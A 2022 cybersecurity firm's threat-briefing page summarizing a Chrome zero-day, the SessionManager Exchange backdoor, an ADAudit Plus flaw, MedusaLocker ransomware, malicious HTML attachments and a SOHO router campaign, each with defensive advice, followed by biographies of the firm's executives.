Get expert threat analysis weekly. Sign up to receive our Threat Briefing:
Date: 7/5/2022
Google Chrome is affected by a zero-day vulnerability that is being exploited in the wild. The vulnerability is tracked as CVE-2022-2294 and relates to a heap overflow flaw in a component that provides real-time audio and video communication capabilities.
Heap buffer overflow vulnerabilities can lead to an attacker executing arbitrary code and potentially evading active security defenses. This vulnerability also impacts the Android version of Chrome.
Users should update Chrome to version 103.0.5060 for Windows, macOS, and Linux. To install Chrome updates, click the three dots in the upper right side of Chrome, select Settings, and then click “About Chrome.” Android users should update to version 103.0.5060.71.
For more information, fill out the form below and we will be in touch shortly
Newly discovered malware has been in the wild since March 2021 and is used for backdoor Internet-facing Microsoft Exchange servers. The malware disguises itself as a module for Internet Information Services (“IIS”) and has been deployed after exploiting past ProxyLogon flaws within Exchange. This malware has been dubbed SessionManager.
IIS modules as backdoors allow malicious actors to maintain persistence stealth and perform a wide range of actions such as collecting emails or launching further attacks inside a victim’s network. Attackers have used this backdoor access to deploy reconnaissance and credential harvesting tools.
Organizations should primarily ensure that Internet-facing Microsoft Exchange servers are up to date. It is strongly recommended that these systems be protected by Endpoint Detection & Response (“EDR”) tools with strong monitoring capabilities. Administrators should also consider disabling public access to the Exchange Control Panel (“ECP”) and the Offline Address Book (“OAB”).
Sources
https://thehackernews.com/2022/07/new-sessionmanager-backdoor-targeting.html
https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/
Researchers have published technical details for CVE-2022-28219, a critical vulnerability in the Zoho ManageEngine ADAudit Plus tool for monitoring activities in Active Directory. The vulnerability allows for unauthenticated remote code execution. However, an attacker would need to require access to the internal network before exploitation unless ADAudit Plus services are accessible from the Internet.
Exploitation permits attackers to execute arbitrary code, upload files, steal account credentials, and potentially leverage ADAudit Plus functionality to deploy malware on all Active Directory managed systems.
Ensure that ADAudit Plus instances are running build 7060. Administrators should also ensure access to ADAudit Plus is restricted and leverage separate service accounts with limited privileges.
The FBI, CISA, and FinCEN have issued joint advisories highlighting a recent increase in MedusaLocker ransomware attacks. These new attacks are attributed explicitly to Remote Desktop Protocol (RDP) access to the victim network. Post-exploitation activities include the detonation of MedusaLocker and the creation of ransom notes pointing to various Bitcoin wallet addresses.
Most attacks have seen an initial compromise via phishing emails that include RDP exploits. Secondary actions include utilizing PowerShell scripts to propagate the ransomware throughout the network. The attacks have also been killing the primary process of any well-known security and forensic software to maintain persistence. The final activity in the kill-chain is the deployment of AES-256 and RSA-2048 algorithms to mass encrypt files and folders.
MedusaLocker is an incredibly successful ransomware variant with a large attack surface since 2019. Combining their sophisticated kill chains with well-established encryption standards, these attacks can have a massive impact on victim networks. Organizations should be on the lookout for these attacks and take appropriate actions.
First and foremost, organizations should be utilizing strong email security and Endpoint Detection and Response products. This will significantly impact the attack surface of the MedusaLocker’s initial access point, most commonly phishing.
Additionally, organizations should have tested and up-to-date recovery plans if a ransomware attack is successful. This should include the ability to retain and restore sensitive or proprietary data through backups and copies of critical data.
Implementing network segmentation and maintaining offline backups of data should also be advised.
Sources
https://thehackernews.com/2022/03/emotet-botnets-latest-resurgence.html
https://thehackernews.com/2022/02/reborn-of-emotet-new-features-of-botnet.htmlFor More Information
Researchers at Barracuda Networks have published an alarming statistic that one in five HTML email attachments contain malicious logic.
This statistic was found after the Barracuda team analyzed millions of attachments that passed Barracuda systems over a multi-month period. Each of these attachments was scanned and compared to similar attachments. Of these millions of attachments, 21% of all HTML attachments were found malicious.
Barracuda reported that attackers had embedded HTML attachments in emails disguised as weekly reports. This tricks users into clicking on phishing links.
The Barracuda team has observed attackers using these HTML attachments for multiple attacks. The method is for credential phishing; attackers include links to phishing sites within the HTML that, when opened, use Javascript to redirect to a third-party machine and request credentials. Similarly, attacks will consist of links that attempt to download malware directly onto user machines. Past that, some attachments don’t even forward users to fake websites. Instead, they create phishing forms directly embedded in the attachments, sending the phishing sites as attachments instead of redirecting links.
Organizations can strengthen their security against malicious HTML attachments in a few ways. First, organizations should ensure that their deployed email security product(s) is/are configured to scan and block malicious email attachments, especially HTML documents. Barracuda specifically recommends solutions that include machine learning and static code analysis to evaluate an email’s content, not just the attachment(s).
Secondly, training users to identify and report malicious attachments is essential. This can significantly reduce the chances of users falling victim to these phishing attacks.
Lastly, if an attack is successful, having robust Endpoint Detection and Response capabilities is key to protecting potentially compromised endpoints.
Sources
https://blog.barracuda.com/2022/06/28/threat-spotlight-malicious-html-attachments/
Lumen Technologies “Black Lotus Labs” division published a report about a router malware campaign.
The campaign targets “more than eighty SOHO router models, including ones from Asus, Cisco, DrayTek, and Netgear.”
Black Lotus Labs has observed the malware capturing network traffic, scanning home networks, and infecting hosts on victim networks with command and control infrastructure such as Cobalt Strike.
The sophistication level of the malware suggests that a nation-state threat actor might be behind the campaign.
The report did not include information regarding suspected end-goals of attackers, but considering the observed activity, the potential is limitless. The campaign infects SOHO (Small-Office/Home-Office) routers, which is a willful blind spot for those managing corporate technology in the “Work From Anywhere” (WFA) environment that most of us find ourselves. Understandably, these technology managers must draw a line regarding what they manage. This demarcation point is often the management of users’ home networks. In the WFA environment, an infected home network can have the same impact as an infected corporate network. This can range from espionage to exfiltration to ransomware.
The most secure end of the WFA spectrum includes corporations supplying and managing Internet connections and networking equipment for all employees. Because employee home networks are primarily out of control of most corporate IT departments, a meticulous focus on IT asset configuration management and Endpoint Detection and Response (EDR) configuration is helpful in the WFA environment. Corporations leveraging the WFA model should, at the very least, include language in policies requiring employees to maintain home network equipment at the highest available patch level.
Sources
https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/?utm_source=referral&utm_medium=press+release
https://www.wired.com/story/zuorat-trojan-malware-hacking-routers/
For strategic clients, your vCISO will add this to your next Office Hours for further discussion. However, if you have an immediate need, concern, or question, please reach out to them directly.
For non-strategic clients, please reach out to your Advisor for further discussion.
For those not yet clients of GreyCastle Security, please click the “Contact Us” button below and we’ll be glad to provide assistance as well as answer any questions you might have.
Offerings
Industries
Compliance
Copyright © 2023 GreyCastle Security. All Rights Reserved
Copyright © 2022 GreyCastle Security. All Rights Reserved
Ho Chin is Chief Financial Officer at GreyCastle Security. In this role, Ho leads Finance, HR, IT and Professional Development. As part of the executive leadership team, Ho works to establish the company’s overall strategy and ensure proper execution of the supporting initiatives pertaining to the above areas of responsibility.
Prior to joining GreyCastle Security, Ho led finance and administrative functions at multiple private equity and venture-backed portfolio companies across multiple industries. Ho holds a bachelor’s degree in Accounting from Pennsylvania State University in Centre County, Pennsylvania and a master’s degree in Business Administration from the Wharton School of Business at the University of Pennsylvania in Philadelphia, Pennsylvania.
Dan Kalil is Chief Executive Officer (CEO) and Board Chairman at GreyCastle Security. In this role, Dan provides vision, leadership and strategies that drive GreyCastle Security’s position as an industry leader. With an emphasis on customer success, Dan’s profitable growth model leverages a customer-centric business approach that balances employee wellbeing and social responsibility.
Prior to becoming CEO, Dan served as the company’s Chief Strategy Officer, during which he supported multiple acquisitions and helped the organization achieve substantial sales growth. In addition to serving as CEO at GreyCastle Security, Dan continues to hold the position of Chief Commercial Officer (CCO) at Assured information Security (AIS) in Rome, New York, a company he co-founded in 2001.
Over the course of the last 22 years, Dan has been committed to advancing the state of cybersecurity and has played an instrumental role in the identification and development of critical, next-generation cyber capabilities. He has held positions in almost every facet of cybersecurity, beginning as a computer forensic examiner and progressing through the management and executive leadership ranks. In addition to co-founding AIS, Dan has facilitated multiple cybersecurity startups, raised investment capital and has served in various lead and support roles toward the acquisition of five companies in the last eight years.
Dan has a bachelor’s degree in Cybersecurity and a master’s degree in Cybersecurity from Utica College in Utica, New York.
Michael Stamas is an entrepreneur, board member, Vice President and a founder of GreyCastle Security. With more than two decades of experience in the technology sector, Mike pairs his management and business development skills with a deep understanding of cybersecurity. Mike brings a unique brand of risk-based advising to GreyCastle clients and prospects.
Mike holds certifications in numerous security and technology related areas, including the Department of Homeland Security and other security technologies like Symantec, Cisco and Microsoft.
Mike plays an active role in his community and serves as a board member and Vice President of InfraGard Albany as well as an advisory board position with the Capital Region YMCA.
Mike has been recognized for his numerous achievements through various honors including the Albany Business Review’s prestigious 40 Under 40 award.
Dan Maynard serves as GreyCastle Security’s Chief Operating Officer, where he currently leads Sales, Marketing and Legal.
Dan has enjoyed a 30+ year career in the Information Technology and Telecommunications industry, during which time he has held various leadership positions for organizations such as Rochester Tel/RCI, Citizens Communications (Frontier), PAETEC Communications, IntegraOptics, tw telecom/Level3 and Centurylink.
In addition to various voice and data technology platforms, he possesses a strong background in leadership development, sales and marketing leadership, transformational leadership and strategic planning. Dan has a thirst for knowledge and as a committed lifelong learner, he encourages and supports professional development initiatives for his teams and continues his involvement with Vistage International.
Dan holds a bachelor’s degree in Biology from Lafayette College in Easton, Pennsylvania, where he was selected as a member of their Athletic Hall of Fame in 2016.
When not at work, Dan enjoys traveling, golfing, attending Utica Comets hockey games and relaxing in the Adirondacks on beautiful Canada Lake with family and friends.
Dan Didier is the Vice President of Solutions and board member at GreyCastle Security.
Dan has been a cybersecurity practitioner for more than 20 years and uses his knowledge and experience to develop cybersecurity solutions that ensure readiness and preparedness.
Dan received his bachelor’s degree in Telecommunications from SUNY Polytechnic Institute in Utica, New York, and graduated Summa Cum Laude with a master’s degree in Information Assurance from Norwich University in Northfield, Vermont.
Our Computer Incident Response Teams (CIRTs) have responded to hundreds of breaches, intrusions, malware infections, thefts, employee investigations, fraud cases and other incidents. Our highly-certified experts have extensive experience in command, coordination and correction of incidents in nearly every industry throughout North America, from local businesses to Fortune 500 international conglomerates.
Francesca LoPorto-Brandow is Director of Culture at GreyCastle Security. In this role, Francesca leads all social responsibility efforts and partnerships and develops effective strategies that promote organizational-wide behaviors and attitudes consistent with a culture of safety, inclusion, teamwork, motivation and high-performance.
Prior to this role, Francesca was Director of People & Culture at GreyCastle and with her leadership, the company’s culture has been recognized by Inc. Magazine as a Nationally recognized Best Workplace, Albany Business Review Best Places to Work and Albany Times Union Top Workplaces.
Before joining GreyCastle Security, Francesca worked as an OD consultant and focused on strategic culture change at The Kaleel Jamison Consulting Group, Inc. for more than six years. There, she facilitated client education sessions, coached leaders and teams, developed and executed consulting interventions and served as strategy project leader on various client engagements. Her work has taken her into Fortune 100 companies and across borders including Panama, Singapore and beyond.
Francesca is a Lean Six Sigma–certified Green Belt, a proud YWCA-GCR board member and in 2013, she coordinated and emceed the inaugural TEDx Troy—a livestream of TEDCity 2.0. Since 2012, she has coordinated and emceed the Troy 100 Forum, a biannual forum for government, religious and community leaders to discuss issues vital to the future of Troy, New York.
Bilingual in English and Italian, Francesca holds a bachelor’s degree in Management and Technology from the Rensselaer Polytechnic Institute’s Lally School of Management & Technology. She was awarded Cybersecurity Recruiter of the year North America in 2017 by the Cybersecurity Excellence Awards.
Jamie Aiello is Senior Vice President of Services and Product Management at GreyCastle Security. In this position, Jamie is responsible for leading a high performing and well-balanced team that is ultimately responsible for the identification, selection, execution and successful performance of our company’s diverse portfolio of cybersecurity offerings.
Prior to joining GreyCastle Security, Jamie has held leadership positions with Annese and Associates, ConvergeOne and BlueSky IT Partners with a focus on delivering cost effective information technology solutions for companies across multiple verticals.
Jamie holds a bachelor’s degree in Political Science from Le Moyne College in Syracuse, New York, a master’s degree in Business Administration from Gardner-Webb University in Boiling Springs, North Carolina and a master’s degree in Computer Information Systems from University of Phoenix in Phoenix, Arizona.